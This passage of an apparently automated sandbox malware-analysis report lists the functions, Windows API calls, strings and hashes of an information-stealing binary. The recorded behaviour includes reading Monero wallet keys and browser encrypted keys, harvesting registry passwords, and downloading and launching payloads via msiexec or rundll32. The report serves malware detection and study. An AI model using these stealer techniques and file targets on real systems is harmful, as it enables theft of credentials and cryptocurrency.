                  • Opcode Fuzzy Hash: 383de669e500d8f03e43a8500a823be3bbcf80a0fa62e6491a7a35f21efa5c06
                  • Instruction Fuzzy Hash: F071CBB5910208ABDB08DFE4DD89FEEB7B9BF48700F108518F615AB290DB74A905CF61
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 006331C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 0063335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 006334EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 09fb28c7e642a7baef2ac3b97836f8d133e15eeeafba233618e63fa9f77184e4
                  • Instruction ID: 9eceda8bd942804dde836549cd0317041f1be4d43bc8def0c5b9c71560df24ee
                  • Opcode Fuzzy Hash: 09fb28c7e642a7baef2ac3b97836f8d133e15eeeafba233618e63fa9f77184e4
                  • Instruction Fuzzy Hash: 2C12F971810118AADB49EBE0DC92FEEB73AAF14300F50415DE54676191EF702B4ADFEA
                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 00626280: InternetOpenA.WININET(00640DFE,00000001,00000000,00000000,00000000), ref: 006262E1
                    • Part of subcall function 00626280: StrCmpCA.SHLWAPI(?,0131F730), ref: 00626303
                    • Part of subcall function 00626280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626335
                    • Part of subcall function 00626280: HttpOpenRequestA.WININET(00000000,GET,?,0131F490,00000000,00000000,00400100,00000000), ref: 00626385
                    • Part of subcall function 00626280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006263BF
                    • Part of subcall function 00626280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006263D1
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00635318
                  • lstrlen.KERNEL32(00000000), ref: 0063532F
                    • Part of subcall function 00638E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00638E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00635364
                  • lstrlen.KERNEL32(00000000), ref: 00635383
                  • lstrlen.KERNEL32(00000000), ref: 006353AE
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: d8b636d6a96f40c75660e381225c408e46e32c5b7813e4f25f51cc3d07a691e4
                  • Instruction ID: 6041f7b371c39283ef099448a8c633559838c2c02d0a3b21f088873b39de599e
                  • Opcode Fuzzy Hash: d8b636d6a96f40c75660e381225c408e46e32c5b7813e4f25f51cc3d07a691e4
                  • Instruction Fuzzy Hash: 72510070910148ABCB58FFA0DD96AED777AAF10300F50402CF8466B592DF346B46EBE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: e571271997b2a1877a55b165098ba5f7d1277b42a96d5cc57508489a2cc5f659
                  • Instruction ID: 551692baca6c6059a77b6dcb19caec7b0afe9ed6af2b9d21c3db32d4abe98068
                  • Opcode Fuzzy Hash: e571271997b2a1877a55b165098ba5f7d1277b42a96d5cc57508489a2cc5f659
                  • Instruction Fuzzy Hash: 32C1C6B59002189BCB58EF60DC89FEA7379BF64304F00459CF50AA7241DB70AA85DFD5
                  APIs
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 006342EC
                  • lstrcat.KERNEL32(?,0131F3E8), ref: 0063430B
                  • lstrcat.KERNEL32(?,?), ref: 0063431F
                  • lstrcat.KERNEL32(?,0131E580), ref: 00634333
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 00638D90: GetFileAttributesA.KERNEL32(00000000,?,00621B54,?,?,0064564C,?,?,00640E1F), ref: 00638D9F
                    • Part of subcall function 00629CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00629D39
                    • Part of subcall function 006299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                    • Part of subcall function 006299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                    • Part of subcall function 006299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                    • Part of subcall function 006299C0: ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                    • Part of subcall function 006299C0: LocalFree.KERNEL32(0062148F), ref: 00629A90
                    • Part of subcall function 006299C0: CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                    • Part of subcall function 006393C0: GlobalAlloc.KERNEL32(00000000,006343DD,006343DD), ref: 006393D3
                  • StrStrA.SHLWAPI(?,0131F4C0), ref: 006343F3
                  • GlobalFree.KERNEL32(?), ref: 00634512
                    • Part of subcall function 00629AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629AEF
                    • Part of subcall function 00629AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00624EEE,00000000,?), ref: 00629B01
                    • Part of subcall function 00629AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629B2A
                    • Part of subcall function 00629AC0: LocalFree.KERNEL32(?,?,?,?,00624EEE,00000000,?), ref: 00629B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 006344A3
                  • StrCmpCA.SHLWAPI(?,006408D1), ref: 006344C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 006344D2
                  • lstrcat.KERNEL32(00000000,?), ref: 006344E5
                  • lstrcat.KERNEL32(00000000,00640FB8), ref: 006344F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 56bdbd7182c27e4b0d137ab101138f65a02515480b49c90e843e26ca4506c643
                  • Instruction ID: 691de739a195e24c2a891ff1f230082ef0125ea8477fa537497f2250ba0d961a
                  • Opcode Fuzzy Hash: 56bdbd7182c27e4b0d137ab101138f65a02515480b49c90e843e26ca4506c643
                  • Instruction Fuzzy Hash: A17156B6900218ABDB54EBA0DC85FEE7379BF88300F00459CF605A7181DA75EB45CFA5
                  APIs
                    • Part of subcall function 006212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006212B4
                    • Part of subcall function 006212A0: RtlAllocateHeap.NTDLL(00000000), ref: 006212BB
                    • Part of subcall function 006212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006212D7
                    • Part of subcall function 006212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006212F5
                    • Part of subcall function 006212A0: RegCloseKey.ADVAPI32(?), ref: 006212FF
                  • lstrcat.KERNEL32(?,00000000), ref: 0062134F
                  • lstrlen.KERNEL32(?), ref: 0062135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00621377
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00621465
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                    • Part of subcall function 006299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                    • Part of subcall function 006299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                    • Part of subcall function 006299C0: ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                    • Part of subcall function 006299C0: LocalFree.KERNEL32(0062148F), ref: 00629A90
                    • Part of subcall function 006299C0: CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 006214EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                   • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 572234510ae6b50a605353b74c4c32543ca87c40f5903e6f8415efbc8bb3a125
                  • Instruction ID: 31d34ddcc1e894316ce6430764f99a861e594a8a1bf27dadb4695898550c29b2
                  • Opcode Fuzzy Hash: 572234510ae6b50a605353b74c4c32543ca87c40f5903e6f8415efbc8bb3a125
                  • Instruction Fuzzy Hash: 565152B1D1011857CB55FBA0DC92BED733DAF54300F4041ACB64A66081EE706B89DFEA
                  APIs
                    • Part of subcall function 006272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0062733A
                    • Part of subcall function 006272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006273B1
                    • Part of subcall function 006272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0062740D
                    • Part of subcall function 006272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00627452
                    • Part of subcall function 006272D0: HeapFree.KERNEL32(00000000), ref: 00627459
                  • lstrcat.KERNEL32(00000000,006417FC), ref: 00627606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00627648
                  • lstrcat.KERNEL32(00000000, : ), ref: 0062765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 0062768F
                  • lstrcat.KERNEL32(00000000,00641804), ref: 006276A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 006276D3
                  • lstrcat.KERNEL32(00000000,00641808), ref: 006276ED
                  • task.LIBCPMTD ref: 006276FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                   • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: 95ab200e8d3d0e495eebc9d38c7a97197a836f6a7a5c35196ffe980dd5bcc203
                  • Instruction ID: eb32d288a2a371a213c51040b506f704f5c386a544e2ad2c8688b7717424ed01
                  • Opcode Fuzzy Hash: 95ab200e8d3d0e495eebc9d38c7a97197a836f6a7a5c35196ffe980dd5bcc203
                  • Instruction Fuzzy Hash: 79317C71901509DFCB48EBA4EC8ADFE777ABB55301B155018F202B72A0DA74E942CF96
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0131F040,00000000,?,00640E2C,00000000,?,00000000), ref: 00638130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00638137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00638158
                  • __aulldiv.LIBCMT ref: 00638172
                  • __aulldiv.LIBCMT ref: 00638180
                  • wsprintfA.USER32 ref: 006381AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                   • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 4120099b1d365520825aa00acf30894420987434365d31c657665937583f4034
                  • Instruction ID: df44dcd6dca91801c975250c2d6dbc47280f8de3b48de849968687a44e8827d3
                  • Opcode Fuzzy Hash: 4120099b1d365520825aa00acf30894420987434365d31c657665937583f4034
                  • Instruction Fuzzy Hash: E0214DB1E44318ABDB04DFD4DC49FAEB7B9FB44B00F104119F605BB280C7B869018BA9
                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                    • Part of subcall function 006247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                  • InternetOpenA.WININET(00640DF7,00000001,00000000,00000000,00000000), ref: 0062610F
                  • StrCmpCA.SHLWAPI(?,0131F730), ref: 00626147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0062618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006261B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 006261DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0062620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00626249
                  • InternetCloseHandle.WININET(?), ref: 00626253
                  • InternetCloseHandle.WININET(00000000), ref: 00626260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                   • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: d4e92a258e93653990368fe7bf22c649d7b56d456c7a2e527551507b7ebfcafd
                  • Instruction ID: 1805268c435758f84514b67bc2a9f5bc396da5991015e43228497816bf135158
                  • Opcode Fuzzy Hash: d4e92a258e93653990368fe7bf22c649d7b56d456c7a2e527551507b7ebfcafd
                  • Instruction Fuzzy Hash: 22517FB1900618ABDB24DF90DC49BEE77BAFB04701F108098F605B72C0DBB4AA85DF95
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0062733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006273B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0062740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00627452
                  • HeapFree.KERNEL32(00000000), ref: 00627459
                  • task.LIBCPMTD ref: 00627555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                   • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
